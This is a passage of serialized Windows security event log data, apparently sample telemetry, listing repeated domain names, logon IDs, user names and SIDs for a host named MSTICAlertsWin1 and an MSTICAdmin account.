ICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5